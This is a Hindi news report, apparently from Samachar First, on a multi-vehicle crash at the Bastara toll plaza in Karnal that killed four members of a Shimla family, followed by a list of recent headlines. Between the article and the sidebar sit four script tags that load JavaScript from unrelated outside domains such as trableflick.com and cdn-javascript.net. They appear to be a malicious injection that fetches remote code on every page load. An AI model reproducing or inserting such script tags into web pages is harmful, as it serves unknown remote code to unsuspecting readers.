करनाल में भीषण हादसे में शिमला के एक ही परिवार के 4 लोगों की मौत

<p>नेशनल हाईवे नंबर-44 पर बसताड़ा टोल प्लाजा पर भीषण सड़क हादसे में दो बच्चों सहित चार लोगों की मौत हो गई, जबकि एक महिला और चालक गंभीर रूप से घायल हो गए है। मृतकों में दो महिलाएं शामिल हैं। चारों मृतक शिमला के एक ही परिवार के बताए जा रहे हैं। हादसा तब हुआ जब तेज रफ्तार ट्रक की टक्कर से पांच वाहन आपस में भिड़ गए और कैश लेन में खड़ी एक कार बुरी तरह से क्षतिग्रस्त हो गई। दुर्घटना की सूचना मिलते ही डीएसपी और मधुबन पुलिस मौके पर पहुंची और घायलों को नजदीकी अस्पताल में भर्ती करवाया। पुलिस ने शव कब्जे में लेकर पोस्टमार्टम के लिए करनाल मुख्यालय भिजवा दिए हैं। पुलिस के अनुसार, मृतकों के परिजनों से देर रात तक संपर्क नहीं हो पाया था। मृतक एक ही परिवार के बताए जा रहे हैं, लेकिन अभी पुलिस इसकी पुष्टि नहीं कर पा रही है। पुलिस के मुताबिक कार सवार चंडीगढ़ जा रहे थे।</p>

<p>जानकरी के आनुसार बीते कल दोपहर बाद दिल्ली की तरफ से आ रहे ट्रक ने एक अरटिगा कार को पीछे से टक्कर मार दी। यह भिड़ंत इतनी जबरदस्त थी कि एक के बाद एक लगातार पांच वाहन आपस में टकरा गए। हादसे में अरटिगा कार एक कैंटर और ट्रक के बीच बुरी तरह फंस गई। शिवानी, सनातन, कोविंद,&nbsp; मृदुला, सरिता, चालक इस्माइल क्षतिग्रस्त कार में फंस गए। करीब आधे घंटे की मशक्कत के बाद सभी कार से बाहर निकाले जा सके।</p>

<p>हादसे में दोनों बच्चे, दोनों महिलाएं और चालक व्यक्ति बुरी तरह से घायल हो गए। राहगीरों की सहायता से उन्हें करनाल के अस्पताल में भर्ती करवाया गया, जहां चिकित्सक ने दोनों बच्चों सनातन 17, कोविंद 13 को मृत घोषित कर दिया, जबकि सरिता 55 और शिवानी 40 ने इलाज के दौरान दम तोड़ दिया। घायल मृदुला और चालक इस्माइल का अस्पताल में इलाज चल रहा है। मृदुला की हालत भी नाजुक बताई जा रही है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578729610832″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

9 hours ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

9 hours ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

11 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

12 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

13 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

14 hours ago